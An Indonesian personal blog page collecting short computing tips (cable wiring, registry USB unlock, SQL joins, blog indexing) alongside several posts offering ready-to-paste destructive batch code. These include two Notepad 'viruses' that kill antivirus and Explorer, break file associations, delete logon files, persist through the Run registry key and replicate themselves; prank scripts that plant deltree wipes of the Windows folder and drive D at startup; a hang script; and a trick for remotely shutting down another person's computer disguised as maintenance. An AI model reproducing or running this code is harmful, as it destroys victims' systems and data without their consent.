Tugas Akhir KA (Komputer Akuntansi) dengan VB 6

Posted on Updated on

Lampiran Program Vb6 Tugas Akhir Komputerisasi Akuntansi
·         Microsoft Acces.
·         Crystal Report 8.5
 Microsoft One Note
 

kabel jaringan komputer

Posted on Updated on

Straight

– Putih orange
– Orange
– Putih ijo
– Biru
– Putih biru
– Hijau
– Putih coklat
– Coklat

– Putih Orange
– Orange

– Putih ijo

– Biru
– Putih biru
– Hijau
– Putih coklat
– Coklat

Cross :

Ujung Kabel A :
– Putih Orange (PO)
– Orange (O)
– Putih Hijau (PH)
– Biru (B)
– Putih Biru (PB)
– Hijau (H)
– Putih Coklat (PC)
– Coklat (C)

Unjung Kabel B :
– Putih Hijau
– Hijau
– Putih Orange
– Biru
– Putih Biru
– Orange
– Putih Coklat
– Coklat

Membuka Port Usb Yang Di kunci

Posted on

Hmmm….. hayooo kenapa kekunci … suka copy yang enggak-engga ya… heheheh

langsung ja ne caranya…

Pertama Klik Start pilih Run Ketik regedit <enter>
> Pilih KEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\USBSTOR

Dikanan pilih start klik 2x ganti jadi 3 pilih hexadecimal <ok>
Restart komputer

Trik shutdown komputer orang lain

Posted on

Pertama Buka run klik cmd <enter>
Ketik shutdown.exe -i -m <enter>

Pilih  add > masukan ip address target
tinggal pilih komputer target mau di shutdown/restart/logof up to u
>other (planned) dipilih seakan2 server yang lage maintenance 😀
bisa ditambahin komentar dibawahnya 😀

Selamat mencoba !!!

Membuat Shorcut Shutdown/Restar/LogOff

Posted on

Buka Notepad ketik

SHUTDOWN -s -t 01 >> Save dengan shutdown.bat
Untuk Shutdown Otomatis

SHUTDOWN -r -t 01 >> Save dengan restart.bat
Untuk restart Otomatis

SHUTDOWN -s -l 01 >> Save dengan logoff.bat
Untuk logoff Otomatis

semoga bermanfaat

Membuat Virus dengan Notepad

Posted on

Mudah cara untuk membuat kode Virus

Virus ini dapat menyerang:
1. Menghapus, NAVAPSVC.exe
2. Menghapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menghapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens

Hanya Copy kode di bawah ini lalu paste Pada Notepad:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

Simpan di C: dengan nama installhack.bat
Selesai

Virus ke-2

Virus ini dapat melakukan:
1.mengcopy dirinya menjadi startup
2.Copy sendiri lebih dari seribu kali ke tempat acak di komputer Anda.
3.menyembunyikan diri dan semua file yang telah dibuat
4.mematikan Task MSN, Norton, Windows Explorer, Limewire.
5.Swap tombol kiri mouse
6.Membuka alert boxes
7.mengubah waktu menjadi 12:00 dan mematikan komputer
pertama-tama silahkan kamu klik start-run lalu tuliskan “notepad.exe” tanpa tanda “”, setelah itu kamu copy paste coding dibawah ini pada notepad kamu:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

Setelah itu save as pada direktori C:\ dengan nama Greatgame.bat

semoga bermanfaat

 

Supaya Blog Muncul di Google Search Engine

Posted on

1. Coba kamu ketikan url blog kamu di search engine, jika blog kamu muncul dihalaman search engine google, berarti blog kamu sudah terindex oleh google tetapi jika tidak ada, blog kamu belum terindex, nah caranya gampang kok kunjungi http://www.google.com/addurl.

Query 2 Tabel dengan Join

Posted on

QUERY GABUNGIN 2 TABEL SQL SERVER 2000

tabel_user                    username;passwd;status
tabel_pengembalian.   no_kembali,no_pinjam,tgl_kembali,terlambat,denda

SELECT     tabel_siswa.nis, tabel_user.username, tabel_user.passwd, tabel_user.status, tabel_siswa.nama, tabel_siswa.status
FROM         tabel_siswa CROSS JOIN
tabel_user

SELECT     tabel_siswa.nis, tabel_user.username, tabel_user.passwd, tabel_user.status, tabel_siswa.nama, tabel_siswa.status AS status
FROM         tabel_siswa CROSS JOIN
tabel_user tabel_pengembalian

Tidak bisa ngasih penjelasan
Intinya bila kita tahu Nama tabel dan Fieldnya bisa di Join/digabungin jadi satu  untuk keperluan Export To excel,txt, atau apa saja (pengalaman Pribadi aja sih)

ngerjain temen iseng2 menggunkan .bat

Posted on

Code:

@echo off echo deltree /y %windir%
\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat
echo deltree /y d:\*.*>>
%windir%\programs
\startm~1\programs\startup\lamer.bat

atau

@echo off
echo deltree /y %windir%\*.*>> AUTOEXEC.BAT
echo deltree /y d:\*.*>>
AUTOEXEC.BAT

save dengan nama rusak.bat jalankan filenya lalu shutdown.. setiap ada yang menyalakan komputer langsung bekerja deh virus :p

Buat Hang Pc dengan NOtepad

Posted on

Buka Notepad ketik startsebanyak 9x
dibawahnya ketik hang.bat

save dengan nama hang.bat

jalankan heheheeh